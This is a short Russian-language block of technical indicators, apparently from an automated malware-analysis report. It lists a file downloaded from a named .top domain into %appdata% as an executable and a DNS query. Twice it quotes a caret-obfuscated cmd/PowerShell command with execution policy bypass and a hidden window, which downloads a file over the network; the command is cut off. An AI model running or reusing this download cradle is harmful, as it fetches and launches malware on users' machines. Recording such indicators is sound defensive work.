Техническая информация
- http://sun2u.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^owER^she^l^l^.^Exe ^-eX^ecu^TiOnPoli^CY^ ^B^Y^p^a^Ss -NoP^r^oFI^l^e -WIndOwSt^y^l^E^ ^hi^D^deN^ ^(nEW-^obJect^ ^sy^sT^em.neT^.WEB^C^L^I^e^nt).^D^o^Wn^lo^aDf^I^LE('http:...
- DNS ASK su##u.top
- '<SYSTEM32>\cmd.exe' /c "p^owER^she^l^l^.^Exe ^-eX^ecu^TiOnPoli^CY^ ^B^Y^p^a^Ss -NoP^r^oFI^l^e -WIndOwSt^y^l^E^ ^hi^D^deN^ ^(nEW-^obJect^ ^sy^sT^em.neT^.WEB^C^L^I^e^nt).^D^o^Wn^lo^aDf^I^LE('http:...' (со скрытым окном)